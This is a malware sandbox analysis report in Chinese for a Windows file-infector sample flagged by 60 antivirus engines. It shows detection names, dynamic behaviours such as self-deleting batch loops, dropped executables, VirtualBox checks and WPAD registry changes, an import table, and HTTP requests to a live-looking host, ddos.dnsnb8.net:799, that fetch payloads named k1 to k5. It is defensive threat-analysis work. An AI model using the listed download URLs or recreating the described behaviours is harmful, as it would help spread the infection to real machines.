6.2
高危
60 个模型检测该样本为恶意!
重新分析
更多

edc663499726d997f0cc147dca8dd68001e15081aab33346f85b70589e69480f

ba3b3ee6884cf13f70f4d5dba4805690.exe

分析耗时

30s

最近分析

文件大小

479.5KB
静态报毒 动态报毒 A + W32 AI SCORE=88 ALI2000007 BANLOAD CLASSIC CSTQAJ DARKSHELL DUMPMODULEINFECTIOUSNME FAMVT FILEINFECTOR HIGH CONFIDENCE INFECTED INFECTPE JADTRE KA@558NXG KUDJ LOADER M1R5 MALICIOUS PE MIKCER NIMNUL OTWYCAL PATCHLOAD PCARRIER RAMNIT ROUE SCORE SMALL STATIC AI TRIUSOR UNSAFE VJADTRE WALI WAPOMI 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee W32/Kudj 20201211 6.0.6.653
Alibaba virus:Win32/InfectPE.ali2000007 20190527 0.3.0.5
CrowdStrike 20190702 1.0
Baidu Win32.Virus.Otwycal.d 20190318 1.0.0.2
Avast Other:Malware-gen [Trj] 20201210 21.1.5827.0
Tencent Virus.Win32.Loader.aab 20201211 1.0.0.1
Kingsoft 20201211 2017.9.26.565
静态指标
Command line console output was observed (50 out of 414 个事件)
Time & API Arguments Status Return Repeated
1619861115.409605
WriteConsoleA
buffer: Usage:
console_handle: 0x0000000b
success 1 0
1619861115.409605
WriteConsoleA
buffer: DRkill [-help] [-quiet] [-pid n] [-exe name] [-underdr] [-v]
console_handle: 0x0000000b
success 1 0
1619867623.497626
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619867623.497626
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619867623.497626
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\lKJQWC.exe"
console_handle: 0x00000007
success 1 0
1619867623.544626
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\lKJQWC.exe
console_handle: 0x00000007
success 1 0
1619867623.559626
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619867623.575626
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619867623.575626
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619867623.575626
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\lKJQWC.exe"
console_handle: 0x00000007
success 1 0
1619867623.591626
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619867623.591626
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619867623.653626
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619867623.653626
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619867623.653626
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\lKJQWC.exe"
console_handle: 0x00000007
success 1 0
1619867623.684626
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\lKJQWC.exe
console_handle: 0x00000007
success 1 0
1619867623.684626
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619867623.684626
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619867623.684626
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619867623.684626
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\lKJQWC.exe"
console_handle: 0x00000007
success 1 0
1619867623.684626
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619867623.684626
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619867623.700626
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619867623.700626
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619867623.700626
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\lKJQWC.exe"
console_handle: 0x00000007
success 1 0
1619867623.716626
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\lKJQWC.exe
console_handle: 0x00000007
success 1 0
1619867623.716626
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619867623.731626
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619867623.731626
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619867623.747626
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\lKJQWC.exe"
console_handle: 0x00000007
success 1 0
1619867623.747626
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619867623.747626
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619867623.778626
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619867623.778626
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619867623.794626
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\lKJQWC.exe"
console_handle: 0x00000007
success 1 0
1619867623.809626
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\lKJQWC.exe
console_handle: 0x00000007
success 1 0
1619867623.809626
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619867623.856626
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619867623.872626
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619867623.872626
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\lKJQWC.exe"
console_handle: 0x00000007
success 1 0
1619867623.888626
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619867623.888626
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619867623.919626
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619867623.919626
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619867623.934626
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\lKJQWC.exe"
console_handle: 0x00000007
success 1 0
1619867623.966626
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\lKJQWC.exe
console_handle: 0x00000007
success 1 0
1619867623.966626
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619867623.981626
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619867623.997626
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619867623.997626
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\lKJQWC.exe"
console_handle: 0x00000007
success 1 0
This executable has a PDB path (1 个事件)
pdb_path D:\derek\dr\build_package\build_drmemory-release-32\dynamorio\bin32\DRkill.pdb
Tries to locate where the browsers are installed (1 个事件)
file C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 个事件)
section P^E\xe0\xa3u}
行为判定
动态指标
Creates executable files on the filesystem (20 个事件)
file C:\Python27\Lib\distutils\command\wininst-6.0.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\4B1B56CC.exe
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\w32.exe
file C:\Python27\Lib\site-packages\setuptools\cli.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\lKJQWC.exe
file C:\tmpsij43m\bin\inject-x86.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\34E17E41.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\24FD14C3.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\17F01BE9.exe
file C:\Python27\Lib\distutils\command\wininst-8.0.exe
file C:\Python27\Lib\site-packages\setuptools\cli-32.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\26690D15.exe
file C:\Python27\Lib\site-packages\setuptools\gui-32.exe
file C:\Python27\Lib\distutils\command\wininst-9.0.exe
file C:\tmpsij43m\bin\is32bit.exe
file C:\Python27\Lib\site-packages\setuptools\gui.exe
file C:\tmpsij43m\bin\execsc.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\3ca365a0.bat
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\t32.exe
file C:\Python27\Lib\distutils\command\wininst-7.1.exe
Drops a binary and executes it (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\3ca365a0.bat
Drops an executable to the user AppData folder (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\lKJQWC.exe
A process created a hidden window (1 个事件)
Time & API Arguments Status Return Repeated
1619861123.692436
ShellExecuteExW
parameters:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\3ca365a0.bat
filepath_r: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\3ca365a0.bat
show_type: 0
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619861117.348436
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (1 个事件)
entropy 6.934597774479002 section {'size_of_data': '0x00004200', 'virtual_address': '0x0007a000', 'entropy': 6.934597774479002, 'name': 'P^E\\xe0\\xa3u}', 'virtual_size': '0x00005000'} description A section with a high entropy has been found
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (15 个事件)
Time & API Arguments Status Return Repeated
1619861119.911436
RegSetValueExA
key_handle: 0x000003f0
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619861119.911436
RegSetValueExA
key_handle: 0x000003f0
value: 𲄠{>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619861119.911436
RegSetValueExA
key_handle: 0x000003f0
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619861119.911436
RegSetValueExW
key_handle: 0x000003f0
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619861119.911436
RegSetValueExA
key_handle: 0x00000418
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619861119.911436
RegSetValueExA
key_handle: 0x00000418
value: 𲄠{>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619861119.911436
RegSetValueExA
key_handle: 0x00000418
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619861119.927436
RegSetValueExW
key_handle: 0x000003e4
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
1619861120.598436
RegSetValueExA
key_handle: 0x0000041c
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619861120.598436
RegSetValueExA
key_handle: 0x0000041c
value: à÷ï {>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619861120.598436
RegSetValueExA
key_handle: 0x0000041c
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619861120.614436
RegSetValueExW
key_handle: 0x0000041c
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619861120.614436
RegSetValueExA
key_handle: 0x00000420
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619861120.614436
RegSetValueExA
key_handle: 0x00000420
value: à÷ï {>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619861120.614436
RegSetValueExA
key_handle: 0x00000420
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
Detects VirtualBox through the presence of a file (5 个事件)
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxControl.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxTray.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxDrvInst.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxWHQLFake.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\uninst.exe
File has been identified by 60 AntiVirus engines on VirusTotal as malicious (50 out of 60 个事件)
Bkav W32.FamVT.DumpModuleInfectiousNME.PE
Elastic malicious (high confidence)
MicroWorld-eScan Win32.VJadtre.3
FireEye Generic.mg.ba3b3ee6884cf13f
McAfee W32/Kudj
Cylance Unsafe
VIPRE Virus.Win32.Small.acea (v)
K7AntiVirus Virus ( 0040f7441 )
Alibaba virus:Win32/InfectPE.ali2000007
K7GW Virus ( 0040f7441 )
Arcabit Win32.VJadtre.3
Baidu Win32.Virus.Otwycal.d
Cyren W32/PatchLoad.E
Symantec W32.Wapomi.C!inf
TotalDefense Win32/Nimnul.A
APEX Malicious
Paloalto generic.ml
ClamAV Win.Malware.Triusor-6793891-0
Kaspersky Virus.Win32.Nimnul.f
BitDefender Win32.VJadtre.3
NANO-Antivirus Trojan.Win32.Banload.cstqaj
AegisLab Virus.Win32.Nimnul.m1R5
Avast Other:Malware-gen [Trj]
Tencent Virus.Win32.Loader.aab
Ad-Aware Win32.VJadtre.3
TACHYON Virus/W32.Ramnit.C
Sophos ML/PE-A + W32/Nimnul-A
Comodo Virus.Win32.Wali.KA@558nxg
F-Secure Malware.W32/Jadtre.B
DrWeb BackDoor.Darkshell.246
Zillya Virus.Nimnul.Win32.5
TrendMicro PE_WAPOMI.BM
McAfee-GW-Edition BehavesLike.Win32.Infected.gm
Emsisoft Win32.VJadtre.3 (B)
SentinelOne Static AI - Malicious PE
Jiangmin Win32/Nimnul.f
Avira W32/Jadtre.B
Antiy-AVL Virus/Win32.Nimnul.f
Gridinsoft Trojan.Heur!.03002201
Microsoft Virus:Win32/Mikcer.B
ViRobot Win32.Ramnit.F
ZoneAlarm Virus.Win32.Nimnul.f
GData Win32.Virus.Wapomi.A
Cynet Malicious (score: 100)
AhnLab-V3 Win32/VJadtre.Gen
BitDefenderTheta AI:FileInfector.991137D00F
ALYac Win32.VJadtre.3
MAX malware (ai score=88)
VBA32 Virus.Nimnul.19209
Zoner Virus.Win32.23755
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2016-08-29 15:12:06

Imports

Library ADVAPI32.dll:
0x473350 OpenProcessToken
0x473354 OpenThreadToken
0x473364 RegDeleteKeyW
0x473368 RegCloseKey
0x47336c RegCreateKeyExW
0x473370 FreeSid
0x473374 SetEntriesInAclW
0x47337c LookupAccountNameW
0x473380 AddAccessAllowedAce
0x473384 InitializeAcl
0x473388 GetLengthSid
0x47338c RegSetKeySecurity
0x4733a0 RegOpenKeyExW
0x4733a4 GetSecurityInfo
0x4733a8 RegEnumKeyExW
0x4733ac RegEnumValueW
0x4733b0 RegDeleteValueW
0x4733b4 RegQueryValueExW
0x4733b8 RegSetValueExW
0x4733bc RegOpenKeyW
0x4733c0 CloseEventLog
0x4733c4 ReadEventLogW
0x4733d4 OpenEventLogW
0x4733d8 ClearEventLogW
Library KERNEL32.dll:
0x473424 GetLastError
0x473428 ReadProcessMemory
0x47342c CloseHandle
0x473430 OpenProcess
0x473434 GetProcAddress
0x473438 GetModuleHandleW
0x47343c TerminateProcess
0x473440 SleepEx
0x473444 GetCurrentProcess
0x473448 GetCurrentThread
0x47344c FindClose
0x473450 FindFirstFileW
0x473454 MoveFileExW
0x473458 MoveFileW
0x47345c DeleteFileW
0x473460 LocalFree
0x473464 GetShortPathNameW
0x473468 GetSystemDirectoryW
0x47346c CreateDirectoryW
0x473470 RemoveDirectoryW
0x473474 FindNextFileW
0x473478 LocalAlloc
0x47347c GetExitCodeProcess
0x473480 WaitForSingleObject
0x473484 CreateProcessW
0x473488 CopyFileW
0x47348c ResumeThread
0x473490 GetThreadContext
0x473494 CreateThread
0x473498 VirtualFreeEx
0x47349c WriteProcessMemory
0x4734a0 VirtualProtectEx
0x4734a4 VirtualAllocEx
0x4734a8 CreateRemoteThread
0x4734ac CreateFileW
0x4734b4 FormatMessageW
0x4734b8 LoadLibraryExW
0x4734bc CreateEventW
0x4734c0 GetCurrentProcessId
0x4734c4 HeapFree
0x4734c8 HeapAlloc
0x4734cc GetProcessHeap
0x4734d0 ExitProcess
0x4734d4 DecodePointer
0x4734e0 GetCommandLineA
0x4734e4 HeapSetInformation
0x4734e8 MultiByteToWideChar
0x4734ec ReadFile
0x4734f0 GetFileType
0x4734f4 GetStringTypeW
0x473500 FatalAppExitA
0x473504 EncodePointer
0x47350c FreeLibrary
0x473510 InterlockedExchange
0x473514 LoadLibraryW
0x473518 GetLocaleInfoW
0x473524 IsDebuggerPresent
0x473528 TlsAlloc
0x47352c TlsGetValue
0x473530 TlsSetValue
0x473534 TlsFree
0x47353c SetLastError
0x473540 GetCurrentThreadId
0x473548 WriteFile
0x47354c GetStdHandle
0x473550 GetModuleFileNameW
0x473554 SetHandleCount
0x473558 GetStartupInfoW
0x47355c Sleep
0x473560 GetModuleFileNameA
0x473568 WideCharToMultiByte
0x473570 HeapCreate
0x473574 HeapDestroy
0x47357c GetTickCount
0x473588 GetCPInfo
0x47358c GetACP
0x473590 GetOEMCP
0x473594 IsValidCodePage
0x473598 LCMapStringW
0x47359c GetConsoleCP
0x4735a0 GetConsoleMode
0x4735a4 RtlUnwind
0x4735a8 SetStdHandle
0x4735ac SetFilePointer
0x4735b0 SetEndOfFile
0x4735b4 HeapSize
0x4735b8 HeapReAlloc
0x4735bc FlushFileBuffers
0x4735c0 WriteConsoleW
0x4735c4 GetUserDefaultLCID
0x4735c8 GetLocaleInfoA
0x4735cc EnumSystemLocalesA
0x4735d0 IsValidLocale

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49178 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49179 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49180 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49181 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49182 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49184 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49185 63.251.106.25 ddos.dnsnb8.net 799

UDP

Source Source Port Destination Destination Port
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 53657 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 50536 239.255.255.250 3702
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://ddos.dnsnb8.net:799/cj//k1.rar 
GET /cj//k1.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k3.rar 
GET /cj//k3.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k2.rar 
GET /cj//k2.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k5.rar 
GET /cj//k5.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k4.rar 
GET /cj//k4.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.